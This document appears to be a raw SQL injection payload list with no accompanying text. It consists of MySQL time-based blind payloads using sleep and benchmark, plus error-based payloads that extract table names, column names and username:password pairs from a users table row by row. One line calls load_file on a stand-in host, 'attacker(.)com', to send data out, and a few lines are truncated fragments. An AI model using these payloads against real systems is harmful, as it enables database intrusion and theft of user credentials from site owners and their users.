(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)
/(select(0)from(select(sleep(9)))v)/*'%2B(select(0)from(select(sleep(9)))v)%2B'"%2B(select(0)from(select(sleep(9)))v)%2B"*/
'%2b(select*from(select(sleep(20)))a)%2b'
XOR(if(now()=sysdate(),sleep(5),0))XOR
0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z
'+AND+(SELECT+2016+FROM+
 OR SLEEP(10/7) --
'; SELECT load_file('\\\\attacker(.)com\\leak')--
'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
id=1),1,1)='a', SLEEP(5),0)
' OR IF(ASCII(SUBSTR(user(),1,1))=114,SLEEP(5),0)--
"id":"56456 AND sleep(15)#"
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)
‘XOR(if(now()=sysdate(),sleep(8),0))XOR’111
/page/‘XOR(if(now()=sysdate(),sleep(8),0))XOR’111/test.test
' OR (SELECT SLEEP(5))--
' OR (SELECT BENCHMARK(10000000,SHA1(1)))--
' OR IF(1=1,SLEEP(5),0)--
' OR IF(SUBSTRING(@@version,1,1)='5',SLEEP(5),0)--
' OR IF(ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))=97,SLEEP(5),0)--
' OR (SELECT 1 FROM (SELECT SLEEP(5))a)--
' OR (SELECT COUNT(*) FROM information_schema.tables GROUP BY CONCAT(0x3a,0x3a,(SELECT CURRENT_USER()),0x3a,0x3a,FLOOR(RAND(0)*2)))--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT password FROM users LIMIT 1),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT(username,0x3a,password) FROM users LIMIT 1),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users LIMIT 1),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users WHERE username='admin'),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 1),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 2),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 3),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 4),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 5),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 6),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 7),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 8),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 9),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 10),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 11),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 12),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 13),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 14),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 15),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 16),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 17),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 18),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 19),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 20),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 21),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 22),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 23),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 24),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 25),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 26),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 27),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 28),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 29),FLOOR(RAND(0)*2))x GROUP BY x)--
' OR (SELECT 1 FROM (SELECT SLEEP(5),CONCAT((SELECT CONCAT_WS(0x3a,username,password) FROM users ORDER BY username LIMIT 1 OFFSET 30),FLOOR(RAND(0)*2))x GROUP BY x)--
